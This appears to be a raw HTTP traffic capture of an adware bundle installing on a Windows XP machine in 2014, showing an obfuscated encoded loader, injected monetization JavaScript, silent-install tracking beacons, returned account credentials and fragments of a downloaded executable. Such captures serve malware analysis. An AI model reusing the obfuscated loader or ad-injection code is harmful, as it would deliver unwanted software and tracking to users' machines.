    MDIwMzgzZDIyMzkzNDIxMjQzNTIxM2EyOTMxMzkzNDJmM2I1MDVjNDA1OTE5MGIxNjQzNG
    QzYjI5MjkyMDIwMzgzZDIyMzkzNDIxMjQzNTI3M2MyZTNjMmYzOTM0M2IyOTRjNDQ1ZDVk
    MjAxMTFkMTU1OTI5MzUzMTNkMjQzZDIzMjIzOTIwMzMzODJkMmUzYjNlMmYzZTMxMjkzMz
    M1MmQ0OTFmMGIxOTE0NGQzYjI5MjkyMDIwMzgzZDIyMzkzNDIxMjQzNTMzM2YzYjMxMzkz
    NDJmM2I1MDFlMDcwNjBmNTMyZjJmMzMzNjM5MzkyMTNkMjIyYTM1MjIyZjJkMzgzOTI2Mm
    UyNzIyMzUyMjJmMzEyNTJmMjAzMDIyMmEyZjJmNTI0ODdjNjM1MDA3MWYxYTAwMDMyNTE2
    MWE0ODQ4NGY0OTA2MDQwNDAwMTc0YzQ1NWQwZTBmMWQ1ZTA0MTYxYzFmMWI1YzBjMDQwMz
    VmMTE1ZTE0MWUxYTRkNTk1OTU4MDIxNTE2NTU0YjVjNDE1ODU5NTgxNjQ3NDM1MzQ1NWQ0
    MDU5NTI1ODQ0NDY0NTUzNDQ1YzRiNTkwZTU5NDQ1NjQ2NTY0MDE4MTcwOTU5NTMyZjJmMz
    MzNjM5MzkyMTNkMjIyYTM1MjIyZjM3MjMyODJkMjYyZjMxMmY1NjQ2NTY0MDE4MTcwOTU4
    NTMyZjJmMzMzNjM5MzkyMTNkMjIyYTM1MjIyZjMxMjUyZjIwMzAyMjJhMmYyZjU2NTI0ND
    VjM2MwZTA2MGI0ZDJmMmYyNzI0MjUyMTNjMzkyNzM0MzUyMjNiMzczYTIyMzAyNTJmM2Qz
    NTJmM2I1MDFlMTcwNjBmNTMyZjJmMzMzNjM5MzkyMTNkMjIyYTM1MjIyZjI1MjYzYTJkMj
    YyZjMxMmY1NjA0MTExZjBlNGYzMDM0MmQyMjNmMjMzNzI0MjMzNjJhMzkzMTM5M2UyMzMw
    MzcyNjNlMmEzOTMxMjUyMzM1MzYyOTIzMzYzMDM0NGM1YzdhNzk0NjA2MDYwNzA4MDIwMD
    M5MTQ1MjVlNTY1ODQ3NTY0NzY0NTA1MDUwNDQ1NDFjMTcxZDFmMDcxMzExMWM0NjRjNGEy
    OTRkMDIwMDA0MTUwODEwNTQzNzc4MTI=', 'knpppdvjro'); }
    ....

    <<< skipped >>>

    GET /plugins/mins/monetization/geo/similar_products_m.js?ver=20&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:23 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401281973"
    Last-Modified: Wed, 28 May 2014 12:59:33 GMT
    Cache-Control: max-age=267
    Content-Length: 106250
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908123.dop012.am4.t,1401908123.cds020.am4.c
    appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeo
    f appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.
    monetization.plugins={};}appAPI.internal.monetization.plugins[217]=fun
    ction(){var a=(function(f){String.prototype.replaceAll=function(i,h){r
    eturn this.split(i).join(h);};var e=f(window);f.fn.visible=function(h,
    C,H){if(this.length<1){return;}var D=this.length>1?this.eq(0):th
    is,v=D.get(0),w=e.width(),l=e.height(),H=(H)?H:"both",m=C===true?v.off
    setWidth*v.offsetHeight:true;if(typeof v.getBoundingClientRect==="func
    tion"){var q=v.getBoundingClientRect(),J=q.top>=0&&q.top<l,o=q.b
    ottom>0&&q.bottom<=l,E=q.left>=0&&q.left<w,z=q.right>0&
    &q.right<=w,i=h?J||o:J&&o,y=h?E||E:E&&z;if(H==="both"){return m&&i&
    &y;}else{if(H==="vertical"){return m&&i;}else{if(H==="horizontal"){ret
    urn m&&y;}}}}else{var x=e.scrollTop(),r=x l,G=e.scrollLeft(),I=G w,n=D
    .offset(),A=n.top,B=A D.height(),F=n.left,u=F D.width(),j=h===true?B:A
    ,k=h===true?A:B,s=h===true?u:F,p=h===true?F:u;if(H==="both"){return !!
    m&&((k<=r)&&(j>=x))&&((p<=I)&&(s>=G));}else{if(H==="vertic
    al"){return !!m&&((k<=r)&&(j>=x));}else{if(H==="horizontal"){ret
    urn !!m&&((p<=I)&&(s>=G));}}}}};var d=(function(m){if(!Array.pro
    totype.indexOf){Array.prototype.indexOf=function(o,p){if(this===undefi
    ned||this===null){throw new TypeError('"this" is null or not defined')
    ;}var q=this.length>>>0;p= p||0;if(Math.abs(p)===Infinity){p=
    0;}if(p<0){p =q;if(p<0){p=0;}}for(;p<q;p ){if(this[p]===

    <<< skipped >>>

    GET /monetization.gif?ibic=4252D7B4B8E54E2E95F19018ADCF24D9IE&verifier=06a66a2d5edd8e17cc634fade0ffd159&campaign=000803&event=11&app=32850&pubdetected=false&procstarttime=1401908103 HTTP/1.1
    Host: logs.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:12 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1344239556"
    Last-Modified: Mon, 06 Aug 2012 07:52:36 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1401908112.dop018.am4.t,1401908112.cds019.am4.c
    GIF89a.............,...........D..;....



    GET /monetization.gif?event=3&ibic=4252D7B4B8E54E2E95F19018ADCF24D9IE&verifier=06a66a2d5edd8e17cc634fade0ffd159&campaign=000803&app=48292&bhover=1_34_05_12&xpiver=0_94&crxver=1_26_55&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908103&asw=00000000000000000000000000000000&asw2=00000000100000000010001000000000&asw3=00000000000000000000000000000000&browser=ie,de HTTP/1.1

    Host: logs.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:12 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1344239556"
    Last-Modified: Mon, 06 Aug 2012 07:52:36 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1401908112.dop018.am4.t,1401908112.cds019.am4.c
    GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Wed, 04 Jun 
    2014 18:55:12 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-A
    live..Accept-Ranges: bytes..ETag: "1344239556"..Last-Modified: Mon, 06
    Aug 2012 07:52:36 GMT..Cache-Control: max-age=86400..Content-Length:
    35..Content-Type: image/gif..X-HW: 1401908112.dop018.am4.t,1401908112.
    cds019.am4.c..GIF89a.............,...........D..;..


    GET /youtube_accelerator/wizardtest/SMALLTEST.HTM?random=244890&mode=nolsp HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
    Host: test.youtubeaccelerator.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Content-Type: text/html
    Content-Encoding: gzip
    Last-Modified: Mon, 21 Jul 2008 09:41:32 GMT
    Accept-Ranges: bytes
    ETag: "bfefaff515ebc81:0"
    Vary: Accept-Encoding
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:41 GMT
    Content-Length: 167
    .............`.I.%&/m.{.J.J..t...`[email protected]#).*..eVe]f.@......{
    ....{....;.N'...?\fd.l..J...!....?~|.?".......~....O......7.O.........
    ....'_>.}. ..>..o.?...MF...HTTP/1.1 200 OK..Content-Type: text/h
    tml..Content-Encoding: gzip..Last-Modified: Mon, 21 Jul 2008 09:41:32
    GMT..Accept-Ranges: bytes..ETag: "bfefaff515ebc81:0"..Vary: Accept-Enc
    oding..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 04
    Jun 2014 18:55:41 GMT..Content-Length: 167...............`.I.%&/m.{.J
    .J..t...`[email protected]#).*..eVe]f.@......{....{....;.N'...?\fd.l..J
    ...!....?~|.?".......~....O......7.O.............'_>.}. ..>..o.?
    ...MF.....


    GET /online/Register.aspx?CV=2.0.0.0&ProductID=12000&UserID=&Password=&OS=5&EMail=&Newsletter=&V=3.3.9.4&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList= HTTP/1.0
    User-Agent: CoreWinInet
    Host: online.GOOBZO.com
    Pragma: no-cache


    HTTP/1.1 200 OK
    Connection: close
    Date: Wed, 04 Jun 2014 18:55:30 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    X-AspNet-Version: 2.0.50727
    Set-Cookie: ASP.NET_SessionId=gyq3hm5555rtu045g05eee55; path=/; HttpOnly
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Content-Length: 98
    <RESULT>.<USER>.<ID>335e88be-0c5e-4ba6-851b-e652ba3e
    6ba3</ID>.<PW>oCQOL84Q</PW>.</USER>.</RESUL
    T>...


    GET /installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=7F1D95218D1E4CF487AAD4B2A3E48467IE&app=32850&appver=0&verifier=1121c510e5f38d154df47b19458d540e&srcid=000046&version_date=21-05-14&subid=0&zdata=0&xpiver=0_94&crxver=0&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=8704&asw3=&procstarttime=1401908094&procruntime=4&rnd=1401908098 HTTP/1.1
    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: Bht3icR0MSngnwTJYGmhcNotc2yIGmSAEefuKjY3R9Ff0e5gqFfJrmrXGK1BfylKSgE9tmaqsfk=
    x-amz-request-id: 3F1AB5C8F7CC08F7
    Date: Wed, 04 Jun 2014 18:55:03 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:57:02 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Bht3ic
    R0MSngnwTJYGmhcNotc2yIGmSAEefuKjY3R9Ff0e5gqFfJrmrXGK1BfylKSgE9tmaqsfk=
    ..x-amz-request-id: 3F1AB5C8F7CC08F7..Date: Wed, 04 Jun 2014 18:55:03
    GMT..Cache-Control: no-cache, must-revalidate..Expires: Mon, 26 Jul 19
    97 05:00:00 GMT..Last-Modified: Mon, 24 Feb 2014 23:57:02 GMT..ETag: "
    28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
    ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;

    ....



    GET /installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=7F1D95218D1E4CF487AAD4B2A3E48467IE&app=32850&appver=200&verifier=1121c510e5f38d154df47b19458d540e&srcid=000046&version_date=21-05-14&subid=0&zdata=0&xpiver=0_94&crxver=0&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=8704&asw3=&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1401908094&procruntime=36&rnd=1401908130 HTTP/1.1

    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: Uw6PONSK nbH87hl9/St9ppnkUzXw8Q gx3djDrthRqAv hxhtuLIltUFJNPiwsdwSUg29FcBJ4=
    x-amz-request-id: 56A1C05042C43E33
    Date: Wed, 04 Jun 2014 18:55:35 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:57:02 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;....



    GET /apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=7F1D95218D1E4CF487AAD4B2A3E48467IE&app=32850&appver=200&verifier=1121c510e5f38d154df47b19458d540e&srcid=000046&version_date=21-05-14&installtime=1401908094&curtime=1401908094&lifetime=0&silent=1&procstarttime=1401908094&procruntime=36&rnd=1401908130 HTTP/1.1

    Host: stats.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2: tTpTkfnlBiI3VQi0xuao4L4VS4AUMmGjQ7IQyHYPoGTQq GC4bKucsgjoVEQgpoeLYM/JBmxqS0=
    x-amz-request-id: EB56F1924833B935
    Date: Wed, 04 Jun 2014 18:55:35 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Mon, 24 Feb 2014 23:56:54 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: tTpTkf
    nlBiI3VQi0xuao4L4VS4AUMmGjQ7IQyHYPoGTQq GC4bKucsgjoVEQgpoeLYM/JBmxqS0=
    ..x-amz-request-id: EB56F1924833B935..Date: Wed, 04 Jun 2014 18:55:35
    GMT..Cache-Control: no-cache, must-revalidate..Expires: Mon, 26 Jul 19
    97 05:00:00 GMT..Last-Modified: Mon, 24 Feb 2014 23:56:54 GMT..ETag: "
    28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Le
    ngth: 35..Server: AmazonS3..GIF89a.............,...........D..;..


    GET /online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=9714b281-04df-4f52-935d-f743d52795b5&Password=YcRnhe0a&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1401908128&SBPIDS=1&KA=1 HTTP/1.0
    User-Agent: CoreWinInet
    Host: online.speedbit.com
    Pragma: no-cache
    Cookie: ASP.NET_SessionId=xnef5hz1iwahs245uyq0rkiy


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 44
    Content-Type: text/html; charset=utf-8
    X-Powered-By: ASP.NET
    X-AspNet-Version: 2.0.50727
    Date: Wed, 04 Jun 2014 18:55:32 GMT
    Connection: close
    <RESULT>.<LASTERROR>0</LASTERROR>.</RESULT>...


    GET /install.ashx?e=uWabAt9SLcwd5zMhdw4gNj7xT0yTfiTDeyEWuAbI0Nvev3l2qMnrnXYyEmQr8/O1yozh0ljnbVDFKzsac0RwM9aJmYbuXbKETzF53EHpwgtyRdUuNvgXmvi3lPIsTTKVy2j7DbiIccdKk0WHcpGM5/1Lsbrv Iy0INwgr2WUatpnX4zrIosQHvq5/0VwNzjIimCwuG1Q3go1K6uMI0cA8bOS1vYD9DbWM3NREWq8wbENEkDdepZg8iYeApy3zoidhXbusBDt62mNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciwyyzTF2Y0WVu HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: mag.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Length: 2344
    Content-Type: application/octet-stream
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:16 GMT
    C.\.S...6....Cn.....~.....5. ..,....$1@.......,...~..]......~m...W0..(
    O..........6.u.\....,).|Y...#r......4.......C.o../..>.......2g.~:*.
    N..o,.6.......0...(......C~.....W0..(O..9.._."...~c.yzO...;....Aa....d
    ...c....mu..y..1 .u..Pb['..Q..I...g....<[email protected].?i.Aa
    ....d..cT:....W.{.."......|........|....&.<..)K.2...._2.S.....?.F..
    ...rlD..i0u...x..u....."I....?..^.$.o...{.k.K.....q@,(..;.?...a(H#C$..
    C..R........3..\P..-yX....T. [email protected].].R<#..S...=..d.XX?.....
    [email protected].].......1B ...x...'...8...E._.f.....c....mi..c~,5..B..
    k....rH.:.X.....3.Lo.r.........*.y.H2...mK.a?tL.%K.~s|[email protected]...
    [email protected].]....Z.....*q.DQ.*.=....C.Q...E_pC
    .2.<Dtb.P.y.....[.Y............[..c....m.W.%P......1.M.a9.].Vt.PKh.
    j....L...........F.PkJ.G...m..0N:."X.O..(.mUK...KC....fw!.^m_.J...9o..
    .M...:.....mM.......E...".....x..fI."S...2.C.l........[...j.'y...c....
    mi..c~,5..B..k....rH.:.X.w...8>...(.F}..)G..K.n....#..e..H.........
    b..D}..*....X).wL.......RW.....iR.....:..)..Y.F#|..w..j.".d..#T.s.....
    a."E.....-....c..wP.Y.\;.t. .../?tL.%K.~s|[email protected]...
    .2t..Hz..-....X.......{[email protected].]....Z........vX|(1...~.I.Q...E_pC..s&
    lt;. ......]._...^5.v%.....p..iK...e..q.".....x.Sv...9..c.|.Kn........
    .#....D....J4..H....f.F..~....|.#....7rZ.{f34.C..v..y} .t.....`..C..U.
    ....).AM..%&....Y..%X...k|..t5.........]._...q(.....u.;..8n..o$......3
    .{p.M..~P...v.n.l.7.J.._...?R.......[.....-14s.....\......O.M.ydiB...J
    ....hEq&^..:iY1.O.wH.|.hO/.4..#......:L.?lk... .|...{(...@.\k...W.

    <<< skipped >>>

    GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
    Host: VVV.download.windowsupdate.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Pragma: no-cache


    HTTP/1.1 200 OK
    Content-Type: text/plain
    Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
    Accept-Ranges: bytes
    ETag: "806f4cbb43dcf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Content-Length: 18
    Cache-Control: max-age=4884
    Date: Wed, 04 Jun 2014 18:55:14 GMT
    Connection: keep-alive
    X-CCC: US
    X-CID: 2
    1401CF3DB40B609892HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modi
    fied: Wed, 12 Mar 2014 05:29:31 GMT..Accept-Ranges: bytes..ETag: "806f
    4cbb43dcf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Conte
    nt-Length: 18..Cache-Control: max-age=4884..Date: Wed, 04 Jun 2014 18:
    55:14 GMT..Connection: keep-alive..X-CCC: US..X-CID: 2..1401CF3DB40B60
    9892..


    GET /monetization.gif?event=4&ibic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&campaign=000169&app=35510&bhover=1_34_05_12&xpiver=0_94&crxver=0&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908096&iep=1&chp=na&ffp=na&browser=ie,de HTTP/1.1
    Host: logs.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:37 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1344239556"
    Last-Modified: Mon, 06 Aug 2012 07:52:36 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1401908137.dop017.am4.t,1401908137.cds019.am4.c
    GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Wed, 04 Jun 
    2014 18:55:37 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-A
    live..Accept-Ranges: bytes..ETag: "1344239556"..Last-Modified: Mon, 06
    Aug 2012 07:52:36 GMT..Cache-Control: max-age=86400..Content-Length:
    35..Content-Type: image/gif..X-HW: 1401908137.dop017.am4.t,1401908137.
    cds019.am4.c..GIF89a.............,...........D..;..


    GET /p.ashx?e=A3ANzFv7fWAfJBuEXOGPjbZ3F1XQsKZI/WD6e6SZIIHGHw2h393u/eTpxIBq/UhPKSzD1VOa2AGkPX72S84aTx6mU6M3hmZBQyGMTBwAMH7Mt 6BEut5hpvg3usbvS7ywHfBD544WbbHYOwAGan1UMcxvcDbxUA2YCpHZc9ZUaEPdfaewClKTBMAGkRtqR4lkOB3v7aTq0HsOFy1JuuOGobmMLPdXjSPOJqg3CYPY8Eb1vqYY5dG9TQ G9t8UJTnBlO Jp7dmc5VAAKZHGiEvuADRTOEl9NdMAynrhmcDJLYh0TFSmgURPDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWldmt6Vgk8tSxrE XAiAXT7DPafqE8Ksx6iX54Mz7OSce7sFfJdDo8VbZqQgAoOW0c oG7kP3/9A= HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; SBUA)
    Host: stub.goobzo.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/plain
    Server: Microsoft-IIS/8.0
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:47 GMT
    Content-Length: 0
    HTTP/1.1 200 OK..Cache-Control: private..Content-Type: text/plain..Ser
    ver: Microsoft-IIS/8.0..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP
    .NET..Date: Wed, 04 Jun 2014 18:55:47 GMT..Content-Length: 0..


    GET /video_accelerator/wizardtest/SMALLTEST.HTM?random=242187&mode=nolsp HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
    Host: test.youtubeaccelerator.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Content-Type: text/html
    Content-Encoding: gzip
    Last-Modified: Mon, 21 Jul 2008 09:41:32 GMT
    Accept-Ranges: bytes
    ETag: "bfefaff515ebc81:0"
    Vary: Accept-Encoding
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:55:38 GMT
    Content-Length: 167
    .............`.I.%&/m.{.J.J..t...`[email protected]#).*..eVe]f.@......{
    ....{....;.N'...?\fd.l..J...!....?~|.?".......~....O......7.O.........
    ....'_>.}. ..>..o.?...MF...HTTP/1.1 200 OK..Content-Type: text/h
    tml..Content-Encoding: gzip..Last-Modified: Mon, 21 Jul 2008 09:41:32
    GMT..Accept-Ranges: bytes..ETag: "bfefaff515ebc81:0"..Vary: Accept-Enc
    oding..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 04
    Jun 2014 18:55:38 GMT..Content-Length: 167...............`.I.%&/m.{.J
    .J..t...`[email protected]#).*..eVe]f.@......{....{....;.N'...?\fd.l..J
    ...!....?~|.?".......~....O......7.O.............'_>.}. ..>..o.?
    ...MF.....


    GET /sense7.exe HTTP/1.1
    Range: bytes=0-249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 0-249999/8693594
    Age: 4821
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: bdIwUYDTs5weFeLZLlm7fl8u97mSrWFsY6t235vN6xR456RtQQGmJg==
    MZ......................@.............................................
    ..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
    .....................l......#C............@...........................
    ................ ..........................................B..........
    ......................................................................
    ...........................text...@........................... .0`.dat
    [email protected]...#.......$................
    [email protected]@.bss..................................0..idata..................
    [email protected]........... [email protected]....
    [email protected].............................................
    ......................................................................
    ......................................................................
    ......................................................................
    ......................................................................
    ............................................U..WVS.......U..E....t...F
    .........;D..H...H.......M..E..5H;D..D$...$....D..M..E.....SS...E...$.
    D$... .D..M..E......M.WW......M.)..M..NT....NP........E.....}...VT....
    ....FP..E........}..VP........U.......FT.............}..........E..M..
    .$..|.D..E..R...D$..E..D$...$....D.....<$....D..E..Q.}.;}...Q....~X
    ........F4..$....D...W..........$.E......E......D$.........D.RR.FX..$.
    D$.....D..5..D.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$..;D.
    ....D...|.......T$...$..QQ.<$....D.S.M..E..D$...$....D.PP1....D

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=500000-749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 500000-749999/8693594
    Age: 4825
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: Pac5gHibusLFzPbzpnMr-Wooh9ePNqpZmnOzGtH-zrcQ67yDc7zy_g==
    ..$..U...........!H.j.z...w...Q`...d#...-....X...;<..p5e.W......m..
    a...E}6. .v....aw?Er........D..w]...c.mIJ..H...'.^...C..w.2.z. ..a.R.G
    ......1..cb.....6..R.. ..;.h.^[email protected]......(LZ.j..n...f.:u[...7..?b.
    ..v.=.....k.. ......j..j.-r..P5._J;.`5.......66E.....X.]oM..^T.X.....H
    %K....S[.Fn.........Jl....;..L6..x>..~._..tD .-...3...\a.--..4./Qc.
    *_.N........_Z.R.."..5..(.v.a.......d.o.....U.>q...P.L4].y....e.X..
    vdc..r.....z......a.$....Ix..O...Cv. ..^.K....plg..v...!./......d..E:.
    ..:.kf&.....|......c.>..o.M........k6\....5*l._.b.9..g.... ..]3....
    ........Jq..5........X.U.l...T...;..O.<..:K.G>[email protected]..}._
    ~.9n....._.b.c.;9......g&.....l.......X.c.#X^7 k.K\h..]...!.bk.l.T...N
    A....A#...Rc~.......H......J.f.0.OmEA.lx.z.Ro.;.;.B..n..5..M&....V.v..
    ...Uh 3...|.....U.I.=.D.v.....^5w]...HEV.6.....-I... K.hsr...t.....X..
    ...e?k.L....R..A.^..{-R....{m.f6X.^A!...O.^[...4..r....."sm`.f...F).m.
    _$...l..0...=.v{/...Y....emA.Yt.1.9...'..i.O$i.>e.?H.......AS....,x
    .!@%.CM..h!......b..\z...|u......d.?....c.W3...%Z......T.....F.".....S
    O.g.,`[.=..>:....."......r[..=c..3..}...U...I=.n5.."...;^{...t...T.
    .N..Y......kJE.7S....)...!...?!..............C..*Ov.]..4..............
    ....;M=T.~..q......Z2H."..e..&...<m9.I.<..&.l8}L4*......M.F.I,..
    .J...%.....n....q/..H..S.....-.}Q..%^c..7..mb.w...#.c%.f.R..`.......2P
    U...tJ.. ?.....T&....3N....I.8A^.p0.3.}.w.\...........Q.b....g,V...Z2v
    .V.......=*..x.%.x...9..w-M.....!6.WoM....tK...c.[ no..'G3.. .....Y...
    ..I../~.....:.....n.....m.MS1............}..".L......|.UO0&...;..|

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=750000-999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Wed, 21 May 2014 16:45:12 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 750000-999999/8693594
    Age: 4828
    X-Cache: Hit from cloudfront
    Via: 1.1 e221f10364b01c985bee5041ce94f592.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: ghtVvgbi-YWNIexF4tC8rebFE28l7yftvVQq4_oEdulPNCTevY3l5A==
    K..,.....E..O.&...v.]...]..4....GM{..0...N.vQS..Z.*.....1...-:. ..."..
    .....D.pR...k.Ml^.`.U..S2...k..}4.~.xt....k...{.t...E......S..S..*.Q..
    ..[.W.....Ip.._.wp|`......YN..%H....V.VHa...[P.....D..'.I#.. .y.!uM.1l
    Y{.jAy.A...J|....U&Jy^>*..7...........`,''......k.=.E.L.....P.....&
    lt;....U-?r,u....>../...........o[....{...].BL...... ......I....#0~
    ..B)>..........,/...B.....(.dr..<f.[..<../.w/Fje.h.YS../.59.w
    .?h...5'.Bq%F.."....9&X.....m.JP.......^[email protected]]..9(..
